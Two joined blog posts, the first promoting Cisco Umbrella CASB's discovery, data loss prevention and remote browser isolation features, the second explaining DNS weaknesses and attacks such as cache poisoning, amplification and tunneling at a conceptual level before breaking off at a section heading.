Cisco Secure Workload

Cisco Umbrella CASB

Cisco Umbrella CASB

In today’s digital landscape, the cloud has become an indispensable part of businesses of all sizes. However, with the increasing reliance on cloud services, ensuring the security of sensitive data and preventing unauthorized access has become a paramount concern. This is where Cisco Umbrella CASB (Cloud Access Security Broker) comes into play. In this blog post, we will explore the key features and benefits of Cisco Umbrella CASB and how it can help organizations fortify their cloud environment.

Cisco Umbrella CASB is a comprehensive cloud security solution that provides visibility, control, and protection across cloud applications and services. It acts as a gatekeeper, enabling organizations to enforce security policies, detect and prevent threats, and ensure compliance in the cloud.

Table of Contents

Highlights: Cisco Umbrella CASB

 

A Platform Approach

We must opt for a platform approach to visibility and control. More specifically, a platform that works in a 3rd party environment. So, for cloud security, this is where secure access service edge (SASE) can assist. In particular, the Cisco version is SASE, or Cisco Umbrella CASB, which comes with various versions depending on your needs.

The SASE Cisco umbrella CASB solution has a variety of CASB security functions and CASB tools, Data Loss Prevention (DLP), and Umbrella Remote Browser Isolation (RBI), which can help you better understand and control your environment.

Automatic Discovery and Risk Profiling

The manual process involves investigating and mapping traffic patterns, data movement, and usage. For this, we need automatic discovery and risk profiling. It would help if you had visibility in applications, files, and data you may know but also the ones you do not know about. You will be amazed by the number of malicious files and data already in sanctioned applications.

 

Related: For pre-information, you may find the following helpful:

  1. SD WAN SASE
  2. Cisco Secure Firewall
  3. SASE Model
  4. Cisco CloudLock

 

Back to Basics: Cisco Umbrella CASB

The Role of SASE

The Cisco Umbrella SASE solution offers other security functionality, such as a cloud-delivered Layer 7 Firewall, Secured Web Gateways (SWG), DNS-layer security, SD-WAN, and Thousand Eyes integration for Monitoring and Observability conditions. So, we have the traditional security stack you are familiar with and added enhancements to the security stack solution to make it more cloud-friendly. These functionalities are part of a single SASE solution that you can benefit from a Cisco Umbrella dashboard with API integrations. 

Cisco Umbrella SASE

SASE Feature


Cloud Access Security Broker and Data Loss Prevention ( in-line)

DNS-Layer Security


Remote Browser Isolation


Secure Web Gateways (SWG)

Layer 7 Firewall

Key Features of Cisco Umbrella CASB

1. Cloud Application Discovery and Visibility: Cisco Umbrella CASB offers deep visibility into cloud applications and services being used within an organization. It helps identify shadow IT and provides insights into data usage and user behavior.

2. Data Protection and Compliance: With advanced data loss prevention (DLP) capabilities, Cisco Umbrella CASB helps organizations prevent the leakage of sensitive data in the cloud. It enables granular policy enforcement, encryption, and monitoring to ensure compliance with industry regulations.

3. Threat Detection and Response: Cisco Umbrella CASB employs powerful threat intelligence and machine learning algorithms to detect and mitigate cloud-based threats. It provides real-time alerts, anomaly detection, and proactive incident response capabilities to defend against cyber-attacks.

Benefits of Cisco Umbrella CASB

1. Enhanced Cloud Security: By integrating seamlessly with cloud platforms and applications, Cisco Umbrella CASB offers centralized security management and protects against data breaches, malware, and unauthorized access attempts.

2. Improved Visibility and Control: With comprehensive visibility into cloud activity, organizations can gain insights into user behavior, identify risky applications, and enforce policies to control their cloud environment.

3. Streamlined Compliance: Cisco Umbrella CASB helps organizations meet the stringent compliance requirements of various industries by offering robust data protection, encryption, and auditing capabilities.

 

Use Case: Cisco Umbrella CASB

The Cisco Umbrella CASB fulfills a variety of CASB security use cases. The use case for the CASB solution depends on where you are in your SASE and cloud security voyage. For example, if you are interested in blocking Malware and content, then Umbrella DNS filtering would be fine.

Umbrella Security Features

However, you may be looking for additional security requirements. For example, you will need Data Loss Prevention (DLP), Cloud Access Security Brokers (CASB), and Umbrella Remote Browser Isolation (RBI). In that case, we need to move toward Umbrella SIG, which includes Layer 7 Firewalls. Cisco Umbrella offers several packages ranging from DNS Security Essentials to SIG Advantage. More information can be found here: Cisco Umbrella Packages.

Along with these security features, Cisco Umbrella also has continuous file monitoring. You scan data at rest for any sanctioned application and files within those approved applications that could be malicious. These tools will improve your security posture and protect organizations against cloud-specific risks.

This post will examine how you start discovering and controlling applications with Cisco Umbrella. The Cisco Umbrella CASB components take you from the initial Discovery to understanding the Risk to maintaining activity by controlling access to specific applications for certain users and actions.

The Cisco Umbrella’s Data Loss Prevention (DLP), Cloud Access Security Brokers (CASB), and Remote Browser Isolation engines carry out these security activities.

 

Cisco Umbrella CASB
Diagram: Cisco Umbrella CASB.

 

Cloud security threats

Today’s shared challenge is that organizations need to know what applications they have in their environment. They also need to figure out what to do with specific types of data or how to find users and assign policies to them. These requirements must be met on someone else’s infrastructure, the cloud.

There are significant risks to working in cloud environments that differ significantly from on-premises. Could you look at storage? For example, unprotected storage environments pose a much greater security risk in the public cloud than in a private data center.

Within an on-premise private data center, the firewall controls generally restrict direct access to storage, limiting the exposure of an unprotected file to users who already have access to data center systems. On the other hand, an improperly managed storage bucket in the public cloud may be entirely unfiltered for the entire Internet, with only a few clicks by a single person or automated playbooks without role-based access control (RBAC).

Umbrella Remote Browser Isolation

What is Remote Browser Isolation? Browsing the Internet is a dangerous activity. Unfortunately, we have an abundance of threats. These include malicious javascript, malvertising, exploit kits, and drive-by downloads. All of these target users interact with web content via their browsers.

Typically, when a user’s browser is compromised, the attacker achieves access to the machine the browser runs on. However, the bad actors’ target assets are rarely on the first machine they compromise. For this, they will commonly proceed to move throughout the network laterally.

Lateral Movements

Unfortunately, the tool they use to move laterally is often a good sys admin tool, so it can be hard to detect as a security best practice; it’s much better to eliminate the availability of any lateral movements.

However, with Umbrella Remote Browser Isolation (RBI), the remote browser runs in an isolated container in the cloud, thus mitigating the attack surface to an absolute minimum and removing the potential to move laterally. Therefore, the most sensible thing to do is to isolate the browsing function. With browser isolation technologies, Malware is kept off the end user’s system, reducing the surface area for attack by shifting the risk of attack to the server sessions, which can be reset to a known good state on every new browsing session, tab opened, or URL accessed.

Umbrella Remote Browser Isolation protects users from Malware and threats by redirecting browsing to a cloud-based host, which for some is based on a containerized technology. Isolation is achieved by serving web content to users via a remotely spun-up surrogate browser in the cloud.

 

Umbrella Remote Browser Isolation
Diagram: Umbrella Remote Browser Isolation.

 

The Umbrella Remote Browser Isolation allows users to access whatever content they want, such as web location or doc. So the user is sent via an isolation engine, stripping away anything that can be malicious, such as Macros or Malware, and then giving them a fully rendered version of whatever the content is.

For example, this could be a web app or a website. So, with remote browser isolation, you are scrubbing away anything that could be malicious and giving them a rendered clean version.

So, to the user, it is fully transparent, and they have no idea that they are looking at a rendered version, but it gives a clean and safe piece of content that will not introduce Malware into the environments without a performance hit.

 

Cisco Umbrella CASB

You can use Cisco Umbrella CASB to discover your actual usage of cloud services through multiple means, such as network monitoring, integration with existing network gateways and monitoring tools, or even monitoring Domain Name System (DNS) queries. This is a form of discovery service that the CASB solution provides.

This is the first step to CASB security, understanding both sanctioned and shadow I.T. Once the different services are discovered, a CASB solution can monitor activity on approved services through two standard deployment options.

First, we have an API connection or inline (man-in-the-middle) interception. Some vendors offer a multimode approach. Both deployment modes have their advantages and disadvantages.

CASB solution
Diagram: CASB solution

 

The CASB alone is far from a silver bullet and works in combination with other security functions. The power of Cisco Umbrella CASB depends on its Data Loss Prevention (DLP) capabilities, which can be either part of the CASB solution or an external service, depending on the CASB security vendor’s capabilities. In the case of the Cisco Umbrella, it has an inline DLP engine.

Data Loss Prevention

After the Discovery is performed, CASB security can be used as a preventative control to block access to SaaS products. This functionality, however, is being quickly replaced through the integration of DLP. DLP systems inspect network traffic, leaving your systems looking for sensitive data. Traffic carrying unauthorized data is terminated to protect it from loss and leakage.

Through integration with a DLP service, you can continue to allow access to a SaaS product, but you can control what is being done within that SaaS product. So, for example, if somebody uses Twitter, you can restrict specific keywords or statements from being sent to the platform.

So, for example, if you’re using something like an application like Salesforce in the cloud, and you have a policy you’re not allowed to copy customer or download customer databases from Salesforce, the CASB solution can enforce that as well as monitor if someone does attempt to download or violate the policies.

 

Data Loss Prevention
Diagram: Data Loss Prevention.

 

Cisco Umbrella CASB: SASE Capabilities

Cisco Umbrella’s CASB, DLP, and Umbrella remote browser isolation (RBI) offering is a core part of Cisco’s overall SASE strategy. The value of CASB security is from its capability to give insight into cloud application use across cloud platforms and identify unsanctioned use.

CASBs use auto-discovery to detect cloud applications and identify high-risk applications and users. In addition, they include DLP functionality and the capability to detect and provide alerts when abnormal user activity occurs to help stop internal and external threats. This enables Cisco Umbrella to expose shadow I.T. by providing the capability to detect and report on the cloud applications used across your environment.

 

Cisco Umbrella Visibility

Description

App Discovery Provides: 

Extended Visibility into cloud apps in use and traffic volume

App Discovery Provides:

App details and risk information

App Discovery Provides:

Capability to block/allow specific apps

 

Now, we have a central place for all applications. Cisco Umbrella CASB looks at all your cloud applications and puts them on a single box, on a single pane of glass that you can manage and look at what’s happening, but that functionality has to exist already. So, instead of going to a hundred different applications and cloud providers, you’re just going to one system, your CASB solution handling everything.

Pillar1: Visibility 

The CASB security should detect all cloud services, assign each a risk ranking, and identify all users and third-party apps able to log in. More often than there are a lot of power users, such as finance, that have access to large data sets. So, files are shared and exposed within the content of files used, and apps are installed.

This is generally down to a slight majority of users controlling most applications. So it’s these users, which are a small amount, that introduce a considerable amount of security risk. In addition, these users often collaborate with several external parties, which will be cloud-based sharing. Not to mention sharing with non-corporate email addresses.

CASB Security
Diagram: CASB Security.

 

  • A key point: Understanding risk.

the first thing you want to do is understand the risk. Here, you can identify risky applications by gaining visibility on any shadow I.T. These apps that admins have no control or visibility into are being used in their environment that they need to protect.

You can also dig into what identities use these applications and why they are used. How do you gain visibility? You may be wondering how you get all this data. A few sources can be used to discover the data we will discuss.

Applications in your environment can be displayed in different categories and break down risk based on other criteria. For example, there is business risk, usage risk, and vendor compliance. Each risk category has different factors used to make up the risk categories. Cisco Umbrella CASB integrates with Cisco Talos, which helps you get the reputation information by looking at the Host domain and URL associated with informing you if the app has a good reputation.

Pillar2: Discovery 

To gain visibility, we have to perform Discovery. The discovery process involves pulling in, logging data out of other security products, and then analyzing the information. All of the capabilities to discover apps work out of the box. You only need to set the user traffic to the Umbrella system. The first is DNS, which we can also discover with the Secure Web Gateway (SWG) proxy and a cloud-delivered firewall.

These SASE engines offer you a unique view of sanctioned and unsanctioned applications. So, if you send traffic through one of these Cisco Umbrella engines, it can collect this data automatically. Also, Cisco Umbrella has a Layer 7 application Firewall that can provide information such as application protocols that will give you information on the top-used protocols per application. 

Umbrella Remote Browser Isolation
Diagram: Cisco Umbrella CASB and the Discovery process.

 

The Umbrella has several components of engines that help with Discovery, such as native proxy, Firewall, and DNS logs. So, the user can be determined when every engine picks up the traffic, such as DNS or Firewall levels. This will give you a holistic view of the application, such as the risk associated and the identity on a per-app basis. So, now we can have a broader look at risk to understand cloud apps and traffic going to, for example, Malware hosts and going C&C command servers, and if any ToR endpoints are running on your network. 

Pillar 3: Data Security and Control

When dealing with any systematic issue, prevention is critical, with a focus on data protection. A good start would be to define which applications are risky. From there, you can build a workflow and data sets that you need to protect from, for example, data leakage. Once Discovery is performed along with risk assessment, you can prevent unwanted applications in your environment, which is the first step in enforcement.

The first component is the CASB security, then DLP to enforce controls. We are creating DLP policies to prevent data leakage. The CASB should be able to identify and control sensitive information. So here, we have DLP features and the capability to respond to classification labels on content.

There is a component called granular control, in which you can allow access to special applications but control different actions for specific applications and users. For example, you can enable access to the app but block uploads. You can then tie this to an identity so only your finance team can upload it. You can allow, secure, and also isolate. The CASB DLP can operate natively and in conjunction with enterprise DLP products via Internet Content Adaptation Protocol (ICAP) or REST API integration. 

A standard DLP engine for the on-premise and cloud locations will eliminate policy duplication. This Cisco Umbrella solution opts for an inline DLP engine without the need to service chain to an additional appliance.

 

Inline Data Loss Prevention

The Data Loss Prevention policy monitors content classified as personally identifiable or sensitive information. When necessary, content is blocked from an upload or a post. With Cisco DLP, there is only one data loss prevention policy.

Rules are added to the policy to define what traffic to monitor (identities and destinations), the data classifications required, and whether content should be blocked or only monitored. For example, an office may want to monitor its network for file uploads that include credit card numbers because the uploads breach company privacy and security policies. A rule that scans the network and uploads to domains can block these files.

Cisco Umbrella: 80 pre-built data Identifiers

There are two primary functions of DLP. The first piece identifies and classifies sensitive data; the second is the actions to take. Cisco Umbrella has robust DLP classification with over 80 pre-built data identifiers aligned with detailed reporting on every DLP report. So, working with DLP, you have first to select data classification. This is where you start your DLP and have different identities for the data. If you are concerned with financial data sets and want to examine credit card numbers, you can choose a list of predicted identifiers. Then, you can add your customizations.

Data Loss Prevention
Diagram: Data Loss Prevention.

 

Cisco umbrella DLP engine also supports regular expressions that support pattern patterns. This allows you to match any pattern. So we have a custom action and pre-built and then apply this to a DLP policy. As you know, there is only one data loss prevention policy. Rules are added to the policy to define what traffic to monitor (identities and destinations), the data classifications required, and whether content should be blocked or only monitored.

Deployment: CASB Solution

CASBs operate using two approaches: Inline CASB solutions reside in the users and service connection path. They may do this through a hardware appliance or an endpoint agent that routes requests through the CASB. This approach requires the configuration of the network and endpoint devices. However, it provides the advantage of seeing requests before they are sent to the cloud service, allowing the CASB to block submissions that violate policy.

API-based CASB solutions do not interact directly with the user but rather with the cloud provider through the provider’s API. This approach provides direct access to the cloud service and does not require any user device configuration.

However, it also does not allow the CASB to block requests that violate policy. As a result, API-based CASBs are limited to monitoring user activity and reporting on or correcting policy violations after the fact.

 

Starting a SASE Project

DLP starting points

As a starting point, when considering DLP, there are a couple of best practices to follow. First, you must “train” a DLP to understand sensitive data and what is not. Especially with DLP, you should have it in monitoring-only mode and not be aggressive and block. You want to understand what is happening before you start to block.

Sometimes, you want to understand more about data and data I.D. and where it moves. Second, a DLP cannot inspect encrypted traffic; if they do, check the performance hit. Third, some cloud SDKs and APIs may encrypt portions of data and traffic, which will interfere with the success of a DLP implementation.

With Cisco Umbrella, as a best practice, you can start with the pre-built identifiers and create custom dictionaries to monitor your organization’s specific keywords and phrases. Then, you can create specific rules based on users, groups, devices, and locations you want to watch data for. Finally, you can choose which destination and apps you like to monitor; many organizations choose only to monitor when creating DLP rules and then enable block over time. 

 

CASB Solution

Data Loss Prevention

  • Disover all applications

  • Calculate Risk

  • Apply controls to identities

  • Detect and mitigate threats

  • Train the DLP engine

  • Do not be aggressive

  • Encrypted traffic support

  • Pre-build identifiers

 

Cisco Umbrella CASB starting points

Consider the following recommendations when starting a project that consists of CASB functionality. First, discover sanctioned and unsanctioned cloud services and then access the cloud risk based on cloud service categories. This includes all cloud services and cloud plug-ins. Once this information has been gained, it can be measured, along with risk. This can then be compared to the organization’s risk tolerance. 

Next, identify and protect sensitive information. Once you find all sensitive information in the cloud, you can classify it and then apply controls to control its movement, such as DLP. For example, additional protections can be used if sensitive data is moved from the cloud services to a local unmanaged laptop.

 

  • A final note: Detect and mitigate threats.

You can access the user’s behavior and any deviations that may signal out-of-normal activity. The CASB is one of many solutions that should be used here—more mature products with advanced detection, such as Splunk User Behavior Analytics (UBA). For example, trust decreases once a significant deviation from the baseline is noticed. You could implement step-down privileges or more extreme courses, therefore changing the level of access. In addition, it would be helpful to track all data’s movement and detect and eliminate Malware. And then have an implementation strategy for remediation.

 

Summary: Cisco Umbrella CASB

In today’s digital landscape, businesses are rapidly adopting cloud technologies to drive innovation and enhance productivity. However, this shift towards the cloud also introduces new security challenges. Enter Cisco Umbrella CASB, a comprehensive cloud access security broker solution that empowers organizations to safely navigate their cloud journey while ensuring data protection and compliance.

Section 2: Understanding Cisco Umbrella CASB

Cisco Umbrella CASB is a robust platform that provides visibility, control, and protection across all cloud applications and services utilized by an organization. It offers a centralized console to manage cloud access, enforce security policies, and detect potential threats. With its advanced capabilities, Cisco Umbrella CASB enables businesses to embrace the cloud securely.

Section 3: Key Features and Benefits

a) Cloud Application Visibility: Cisco Umbrella CASB offers deep visibility into cloud applications and services being used within an organization. It provides valuable insights into user activities, data transfers, and potential risks, allowing administrators to make informed decisions.

b) Policy Enforcement: With granular policy controls, Cisco Umbrella CASB enables organizations to define and enforce security policies tailored to their specific needs. It ensures that data is accessed, shared, and stored within the cloud according to predefined guidelines, reducing the risk of data breaches or unauthorized access.

c) Threat Detection and Response: By leveraging advanced threat intelligence and machine learning, Cisco Umbrella CASB proactively identifies and mitigates potential threats within cloud environments. It alerts administrators about anomalous activities, suspicious behavior, or policy violations, enabling swift incident response.

Section 4: Seamless Integration and Scalability

Cisco Umbrella CASB seamlessly integrates with existing security infrastructure, including firewalls, proxies, and endpoint security solutions. This integration allows businesses to leverage their existing investments while extending comprehensive cloud security capabilities. Additionally, the solution scales effortlessly as organizations expand their cloud footprint, ensuring continuous protection.

Section 5: Real-World Use Cases

a) Data Loss Prevention: Cisco Umbrella CASB helps prevent sensitive data leakage by monitoring and controlling data transfers within cloud applications. It enables organizations to set up policies that restrict the sharing of confidential information or personally identifiable data, reducing the risk of data loss incidents.

b) Compliance and Governance: With its robust auditing and reporting capabilities, Cisco Umbrella CASB assists organizations in meeting regulatory compliance requirements. It provides detailed logs and insights into user activities, ensuring transparency and accountability in cloud usage.

Section 6: Conclusion

Cisco Umbrella CASB is a game-changer in the realm of cloud security. Its comprehensive feature set, seamless integration, and scalability make it an invaluable asset for organizations aiming to secure their cloud journey. By harnessing the power of Cisco Umbrella CASB, businesses can unlock the true potential of the cloud while safeguarding their critical assets and maintaining compliance.

DNS Security

DNS Security Solutions

DNS Security Solutions

In today's digital landscape, where cybersecurity threats loom large, it is crucial to fortify your online presence. DNS (Domain Name System) security is an often overlooked aspect of online security. In this blog post, we will delve into the world of DNS security solutions, exploring their significance and the measures you can take to protect your digital assets.

The Domain Name System is the backbone of the internet and is responsible for translating user-friendly domain names into IP addresses that computers can understand. However, this critical function also makes DNS vulnerable to cyberattacks. This section will discuss DNS attacks' potential risks and consequences, highlighting the need for robust security measures.

Table of Contents

Highlights: DNS Security Solutions

No Security By Default

This post will outline the domain name system: the DNS structure, the vulnerabilities and abuses of DNS security designs, and guidance on implementing DNS protection with examples of DNS security solutions with Cisco, like Cisco Umbrella DNS. Unfortunately, like many Internet protocols, the DNS system was designed without security in mind and contained several security limitations regarding privacy, integrity, and authenticity.

Constant Security Threats

These security constraints, combined with bad actors’ technological advances, make DNS servers vulnerable to a broad spectrum of attacking DNS vectors, including DNS Reflection attack, DNS tunneling, DoS (Denial of Service), or the interception of private personal information via means of data exfiltration via the DNS protocol. As you can presume, this causes the DNS layer to be an excellent avenue for bad actors to operate when penetrating networks and exfiltrating data.

Related: For pre-information, you will find the following posts helpful:

  1. OpenShift SDN
  2. GTM Load Balancer
  3. Open Networking
  4. SASE Model



DNS Security Cisco

Key DNS Security Solutions Discussion points:


  • Numerous attacking DNS vectors.

  • Decentralized but not secure.

  • DNS queries are not encrypted.

  • Privacy, Integrity and Authenticity do not exist.

  • Issues with UDP as transpot.

  • Cisco DNS Security with Cisco Umbrella DNS

  • DNS Solution and PKI.

Back to Basics: DNS Security Solutions

♦ DNS Caching

The whole resolution process may be more transparent. However, it’s usually relatively fast. One of the features that speed it up considerably is caching. A nameserver processing a recursive query may have to send out several queries to find an answer. However, it discovers a lot of information about the domain namespace as it does so.

Each time it refers to another list of nameservers, it learns that those nameservers are authoritative for some zone, and it knows the addresses of those servers. At the end of the resolution process, when it finally finds the data the original querier sought, it can also store it for future reference.

♦ Types of DNS Attacks

DNS attacks come in various forms, each with modus operandi and potential damage. From DDoS attacks that flood servers to cache poisoning that redirects users to malicious websites, understanding these attack vectors is crucial for implementing adequate security strategies. This section will shed light on some common types of DNS attacks.

♦ DNS Security Solutions

Thankfully, several DNS security solutions are available to safeguard your online presence. This section will explore some of the most effective and widely used security measures. From implementing DNSSEC (DNS Security Extensions) to deploying firewalls and intrusion detection systems, we will discuss how these solutions can help mitigate DNS-related threats.

♦ Best Practices for DNS Security

While deploying DNS security solutions is essential, following best practices to enhance your security posture is equally important. This section will outline some key best practices for DNS security, including regular patching and updates, monitoring DNS traffic, and employing multi-factor authentication. By adopting these practices, you can bolster your defenses against potential threats.

DNS Layer Security: Decentralized but not secure

The DNS protocol was developed to be decentralized and hierarchical, though not secure. Almost since its inception, there have been exploits. We must protect this critical network service. Several technologies have been implemented for DNS protection. These security technologies can be implemented with secure access service edge (SASE) products such as DNS security Cisco with the Cisco Umbrella DNS product. Cisco Umbrella DNS stops threats such as Malware before the initial connection.

DNS Protection: Are DNS inquiries encrypted?

DNS queries are not encrypted. Even if users use a DNS resolver like 1.1.1.1 that does not track their activities, DNS queries travel over the Internet in plaintext. Anyone who intercepts the query can see which websites the user is visiting. This absence of privacy impacts security significantly. If DNS queries are not private, it becomes easier for governments to censor the Internet and for bad acts to lurk on users’ online behavior unknowingly.

DNS Protection with Privacy, Integrity, and Authenticity

So, with DNS, the primary thing we care about with security is not there. In security, we care about privacy, integrity, and authenticity. However, with DNS left to its defaults, with privacy, you can see all the DNS queries in plain text. Then, for integrity, we want to know if someone has made changes between the query and response DNS stages. Finally, for authenticity, we have yet to learn if the DNS server that responded is the server we want to talk to, not some man-in-the-middle snooping and intercepting the DNS queries and forging responses, leading users to malicious websites.

These concerns have directed us to introduce technologies for DNS protection. Some DNS protection technologies include the DNS firewall, DNS as a security tool with DNS reputation and inspection, and secure the channel with DNS over TLS (DoT) and DoH (DNS over HTTPS), as well as security protocol implementations with DNSSEC. When implemented correctly, all of this helps restore the privacy, integrity, and authenticity security issues we have with the current implementation of the DNS protocol.

DNS Security Solutions
Diagram: DNS Security Solutions.

DNS Protection: Lack of DNS Security  Solutions

Early days of DNS

In the early 1980s, the network was much smaller, with fewer relatively well-known and trusted participants. However, as the network scaled, DNS remained an insecure and unauthenticated protocol, even though the networks grew to have many relatively unknown and untrusted participants.

Since 1980, we have been stuck with this protocol. At that time, around a hundred hosts around the USA communicated with each other. Some of these communication protocols include FTP and SMNP. You still needed to find the IP back then, so you had to look it up in a host file. Then, if you wanted to be put into this host file, you would have to call Stanford and request it literally, and they wrote it manually for you.

Diagram: DNS Protection.

Before you can scale, we need to create something to replace the host file. This was when the Domain Name System was designed. So, we have delegation with hierarchy instead of a host file that must be manually edited for new hosts.

With the Domain Name System, we have the concept of hierarchy. There is a Root at the very top, which is responsible for the IP for the servers for the TLDs, which are the .com and .org; there are thousands of them now, and they are responsible for the domains that are in them and not any other domains that not part of that TLD.

DNS protection: DNS creates blind spots

Organizations widely trust DNS. The concept of trust in public and private IP addresses boils down to binary numbers and has nothing to do with one being more trustworthy, except for the excessive trust placed on private IP ranges.

DNS traffic is typically permitted to pass freely through network firewalls and other security infrastructure. However, it is attacked and abused by bad actors with malicious intent. Because of this, DNS traffic can be manipulated through techniques such as DNS tunneling and DNS poisoning. All of which create blind spots in your security posture.

The issue with UDP

Let us start with the basics; clients can ask for DNS if they want to connect to an address such as ‘www.network-insight.com’ and need to know which IP address corresponds to it. Typically, all DNS messages are sent over UDP. This is where the problems start.

The first issue is that UDP is a stateless protocol and that source IP addresses are blindly trusted, similar to how everyone would trust a private IP address over a public one. Therefore, each request and response described here is a single UDP request containing to and from IP addresses. 

Any host can forge the source address on a UDP message, making it look like it came from the expected source. Therefore, a bad actor sitting on a network that does not filter outbound packets can construct a UDP message that says it’s from the authoritative server and send it to the recursive resolver.

Diagram: Attacking DNS.

DNS Security Cisco with DNS Security Solutions:

Neglected attack surface

Today’s bad actors use DNS’s often neglected attack surface – to steal data, spread malware, perform data exfiltration, command, and control network surveillance, along with the capabilities to perform social engineering.

DNS is a bi-directional and Internet-facing protocol that carries a tremendous amount of data, making it an adversary’s most excellent tool for carrying out attacks and causing damage. In addition, the combination of security teams failing to secure their DNS traffic and the ubiquity of DNS makes it a bad actor’s most potent yet unforgotten tool.

While they have solutions that inspect and secure areas like their network with a stateful firewall and web traffic with Secure Web Gateways (SWG) and even some of the newer zero trust technologies, these solutions cannot perform a deep inspection of their DNS traffic, leaving them vulnerable to the many threats today that abuse DNS. This is because they are not designed to inspect DNS traffic. As a result, techniques such as DNS tunneling should be noticed.

In most instances, DNS packets – typically including IP address information – enter networks via unblocked ports without first being inspected by security systems. So, again, DNS activity in a network is rarely monitored. This makes the DNS layer the perfect blind spot for bad actors to manipulate.

Many of today’s sophisticated attacks depend on DNS activity. In addition, there is a rise in Malware; ransomware binaries, once executed, are quick to encrypt, and you can’t trust that your employee won’t click on a phishing email. As a result, there needs to be more trust and high complexity.

Bad actors use this and manipulate DNS to stage the internet infrastructure to support each attack stage to execute their kill chain fully. In many of today’s more sophisticated ransomware attacks, for example, bad actors will use DNS packets to upload Malware to a device.  

 DNS Security 

DNS Attack

Zero-day attack

Cache poisining

Denial of Service and Distributed

DNS Amplification

Fast-Flux DNS

DNS Protection

Introduction to attacking DNS

The vulnerability and abuses of this protocol are comprehensive, and there are several methods of attacking DNS. We have, for example, DNS poisoning, denial of service, spoofing/hijacking, and DNS tunneling.

Unless you have DNS-layer security, the DNS packets typically used to communicate IP addresses will only be inspected as they move through your network. Additionally, most security solutions don’t even register anomalous DNS activity – like DNS tunneling- a sure sign of an in-progress attack. DNS tunneling uses the DNS protocol to communicate non-DNS traffic over port 53. It sends HTTP(s) and additional protocol traffic over DNS.

DNS tunneling establishes DNS tunnels between their servers and victims’ machines. This connection between attacker and victim allows for the exfiltration of sensitive data and the execution of command and control operations.

DNS Poisoning 

DNS Poisoning, or DNS cache poisoning, is where forged DNS data is submitted into a DNS resolver’s cache. This results in the resolver returning an incorrect IP address for a domain. Therefore, rather than going to the indented website unknown to the user, their traffic can be redirected to a malicious machine. More often, this will be a replica of the original site used for malicious purposes, such as distributing Malware or collecting login information.

DNS poisoning was first uncovered in 1998. Where a recursive server sends a query out to the Root. As we are using UDP, there is no connection, and the only thing back then to identify the query as it came back as a response was simply a Query ID. That was a little short. Now, there was the possibility to trick a DNS recursive resolver into storing incorrect DNS records. Once the nameserver has stored the wrong response, it will return it to anyone who asks.

This “DNS poisoning” attack could allow random attackers to deceive DNS and redirect web browsers to false servers, hijacking traffic. Furthermore, the incorrect stored entry will remain until the cache entry expires, down to the TTL, which could lead to weeks of compromise.

DNS poisoning
Diagram: DNS poisoning.

So, if you attacked the server with forged responses for a domain and tried to brute-force the Query ID not very long ago, you could eventually guess it and insert your response into that recursive server cache.

And if you set the TTL for a low time, such as a week, then everyone that queries that recursive server will get your chosen IP address for this domain name. Today, there have been changes to mitigate DNS poisoning. They have made the Query string very long and hard to guess, so it is hard to do, but it can still happen.

DNS Spoofing

Then we have DNS Spoofing, or hijacking is very easy to do and difficult to detect. For example, let’s say you type the incurred domain name. So you try to go somewhere that does not exist and are returned to a search page with many ads. This is the ISP that is hijacking NX domain responses. So when you try to query for a name that does not exist, your ISP sees this, crafts its response, and sends you to a search page to sell you ads. This commonly happens on public Wi-Fi networks.

So, we have similar DNS spoofing and DNS poisoning attacks, but they have distinguishable characteristics. Both DNS attacks attempt to trick users into revealing sensitive data and could result in a targeted user installing malicious software that can be used later in the kill chain. Poisoning DNS cache changes entries on DNS resolvers or servers where IP addresses are stored. 

DNS Amplification Attack (DNS Flood)

Then, we have the DNS amplification style of DNS attack. They are also known as DNS floods. A bad actor exploits vulnerabilities to initially turn small queries into much larger payloads, which are used to bring down the victim’s hosts.

So, we know that DNS uses UDP for transport, meaning a bad actor can spoof the source address of a DNS request and send the response to any IP address of their choosing. In this case, they can amplify DDoS attacks using DNS responses larger than the initial query packet. For example, fake DNS lookups to open recursive servers can achieve a 25x to 40x amplification factor. This is because the source IP of the bogus lookups is the victim’s website, which becomes overwhelming.

DNS Flood Attack

DNS flood targets one or more DNS servers belonging to a given zone, attempting to impede the resolution of resource records of that zone and its sub-zones. This attack overwhelms the network capacity that connects authoritative servers to the Internet.

Once the bandwidth is depleted with malicious traffic, legitimate traffic carrying DNS queries from legitimate sources cannot contact the authoritative servers. DNS flood attacks differ from DNS amplification attacks. Unlike DNS floods, DNS amplification attacks reflect and amplify traffic off unsecured DNS servers to hide the attack’s origin and increase its effectiveness.

Diagram: DNS Security Solutions and flood attacks.

Random Subdomain Attack

Random Subdomain DDoS attacks are becoming popular in recent attacks, such as in the Mirai attack on Dyn. In these DNS attacks, many queries are sent for a single or a few target domains, yet they include highly varying nonexistent subdomains generated randomly.

This denial of service attack hits a domain’s authoritative name servers with multiple requests for random, nonexistent subdomains. The name servers become bogged down when replying to these phony requests and need help to respond to legitimate queries. These attacks are also called NXDomain attacks; they can result in denial of service at the recursive resolver level.

DNS Tunneling

Then, we have DNS tunneling, which we briefly mentioned. DNS tunneling is frequently used to deliver payloads encoded in DNS queries and responses, exfiltrate data, and execute command and control attacks as the attackers use SSH, TCP, or HTTP to pass, for example, Malware or stolen information into DNS queries undetected.

This allows the bad actor to exfiltrate sensitive data in small chunks within DNS requests to bypass security. With the amount of DNS traffic and requests a network typically sees, attackers can hide data theft easily.

The bad actor can use standard protocols like TCP or SSH, encoded within DNS protocol requests. At the same time, it is not an attack on DNS. This form of malicious activity can use DNS to exfiltrate data.

DNS Tunneling
Diagram: DNS Tunneling.

DNS Security Cisco

Cisco Umbrella DNS: The DNS Firewall

There are several ways these attacks can be prevented. Firstly, the DNS firewall enables DNS layer security. DNS-layer security effectively prevents malicious activity at the earliest possible point and, in the case of Malware, contains callbacks to attackers. DNS security solutions can be accomplished with products such as Cisco Umbrella DNS.

DNS Security Cisco with DNS-layer security

Cisco Umbrella DNS uses DNS-layer security encompassing the Internet’s infrastructure to block malicious and unwanted domains before a connection is established as part of recursive DNS resolution. In addition, it utilizes a technology known as selective cloud provide that redirects specific requests noted as risky for a deeper and more thorough inspection.

Cisco Umbrella DNS accomplishes this process transparently through the DNS response without adding latency or degrading performance. Just as a standard firewall watches incoming and outgoing web traffic and blocks unsafe connections, a DNS firewall works the same way. The distinction is that DNS firewalls analyze and filter queries based on threat feeds and threat intelligence. There are two kinds of DNS Firewalls: those for recursive servers and those for authoritative servers.

A DNS firewall provides several security services for DNS servers. A DNS firewall sits between a user’s recursive resolver and the authoritative nameserver of the website or service they are trying to reach. This can help with reputation filtering and domain reputation.

Cisco Umbrella DNS: Secure the channel

